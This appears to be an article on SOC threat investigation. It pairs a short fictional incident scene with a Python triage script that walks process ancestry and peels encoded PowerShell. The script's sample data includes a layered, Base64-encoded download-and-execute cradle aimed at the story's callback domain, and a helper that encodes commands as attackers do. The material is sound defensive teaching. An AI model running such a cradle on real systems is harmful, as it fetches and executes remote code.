Effective Threat Investigation for SOC Analysts (May 2026)

He pulled the log. Source IP: 10.12.88.204. Internal. The HR file server.

He dove deeper. Parent process of the SMTP connection: not svchost.exe, not a mail client. It was winword.exe. A Word document.

His heart hammered. Encoded PowerShell. He decoded the first layer. A download cradle. The second layer? A callback to a domain he didn't recognize: journalofsocresearch[.]com.

The detonation was clinical. The document opened. No macros. No VBA scripts. Just a single, embedded OLE object—a link to a SharePoint site that didn't exist anymore. But the link contained a string of Base64. Marcus decoded it. Not a payload. A command.

His jaw tightened. He'd written the playbook for this exact scenario last quarter. "Effective threat investigation," he muttered to himself, "means never trusting the label."

This was the moment the textbooks didn't prepare you for. The moment where the "read online" guides stop at "enrich the indicator" and "escalate to tier 3." But Marcus was tier 3. There was no one above him at 3:15 AM except the on-call manager who'd ask, "Is it a real fire, or a flicker?"

Marcus didn't say "I found a suspicious file." He didn't say "high severity."

He said: "Threat actor has had persistent access for 52 hours. They're using living-off-the-land binaries and a fresh domain with no intel footprint. I've isolated five assets, but the DC is likely compromised. We need to assume all credentials are burned. The investigation is no longer effective—we're in containment."
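The two pivots Marcus makes in the story, from an outbound connection to the process ancestry behind it and then layer by layer through an encoded PowerShell command line, are the kind of thing a SOC analyst automates. The script below is an added example in Python, not code from the original page. The telemetry is constructed (the Sysmon-like field names are my own choice), the command line is built inline from the narrative's callback domain with a hypothetical path and cradle, and nothing on the network is ever contacted.

```python
"""Pivot from an outbound connection to its process ancestry, then peel
layered -EncodedCommand PowerShell.  Telemetry below is constructed for the
example (Sysmon-like field names are my own choice); nothing is contacted."""
import base64
import re
from typing import Dict, List

OFFICE_BINARIES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# -e / -ec / -en / -enc / -EncodedCommand: the common spellings of the flag.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def encode_for_powershell(script: str) -> str:
    """Build a -EncodedCommand argument the way an attacker would: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def _bytes_to_text(raw: bytes) -> str:
    # Unicode.GetString blobs are UTF-16LE and full of NULs; UTF8.GetString blobs are not.
    return raw.decode("utf-16le" if b"\x00" in raw else "utf-8", errors="replace")


def decode_layers(cmdline: str, max_layers: int = 5) -> List[str]:
    """Return each decoded layer, outermost first: the -enc blob, then every
    FromBase64String literal found inside the previous layer (depth bounded)."""
    layers: List[str] = []
    match = ENC_FLAG.search(cmdline)
    if not match:
        return layers
    current = _bytes_to_text(base64.b64decode(match.group(1)))
    layers.append(current)
    while len(layers) < max_layers:
        inner = B64_LITERAL.search(current)
        if not inner:
            break
        current = _bytes_to_text(base64.b64decode(inner.group(1)))
        layers.append(current)
    return layers


def defanged_hosts(script: str) -> List[str]:
    """Hostnames pulled from download cradles, defanged so nobody clicks them from a ticket."""
    return [h.replace(".", "[.]") for h in URL_HOST.findall(script)]


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, procs: Dict[int, dict], limit: int = 16) -> List[str]:
    """Image names from pid up to the highest ancestor in the telemetry (cycle/depth bounded)."""
    chain: List[str] = []
    while pid in procs and len(chain) < limit:
        chain.append(_basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def triage(events: List[dict]) -> List[dict]:
    """Flag every network connection whose ancestry includes an Office binary and
    peel any encoded PowerShell on the connecting process's command line."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []
    for e in events:
        if e["type"] != "network":
            continue
        chain = ancestry(e["pid"], procs)
        if not OFFICE_BINARIES.intersection(chain):
            continue
        layers = decode_layers(procs.get(e["pid"], {}).get("cmdline", ""))
        findings.append({
            "src": e["src"], "dst": e["dst"], "dst_port": e["dst_port"],
            "chain": chain,
            "layers": layers,
            "domains": defanged_hosts(layers[-1]) if layers else [],
        })
    return findings


# Constructed sample: a Word document spawns PowerShell that reaches out over SMTP.
# The domain is the narrative's indicator; the path and the cradle are assumptions.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://journalofsocresearch.com/j.ps1')"
STAGE1 = ("$d=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
          + encode_for_powershell(STAGE2) + "'));IEX $d")
CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_for_powershell(STAGE1)

EVENTS = [
    {"type": "process", "pid": 812,  "ppid": 4,    "image": r"C:\Windows\explorer.exe"},
    {"type": "process", "pid": 4120, "ppid": 812,  "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"type": "process", "pid": 5588, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": CMDLINE},
    {"type": "process", "pid": 1200, "ppid": 4,    "image": r"C:\Windows\System32\svchost.exe"},
    {"type": "network", "pid": 5588, "src": "10.12.88.204", "dst": "203.0.113.10", "dst_port": 25},
    {"type": "network", "pid": 1200, "src": "10.12.88.204", "dst": "203.0.113.20", "dst_port": 443},
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"{f['src']} -> {f['dst']}:{f['dst_port']} via {' <- '.join(f['chain'])}")
        for i, layer in enumerate(f["layers"], 1):
            print(f"  layer {i}: {layer[:80]}")
        print("  callback:", ", ".join(f["domains"]))
```

The svchost.exe connection on 443 is left alone and the one whose ancestry runs through WINWORD.EXE is flagged, with both decoded layers and the defanged callback host attached to the finding. The ancestry walk and the layer peeling are both depth bounded, so a forged parent PID loop or a self-referential Base64 blob cannot hang the triage run.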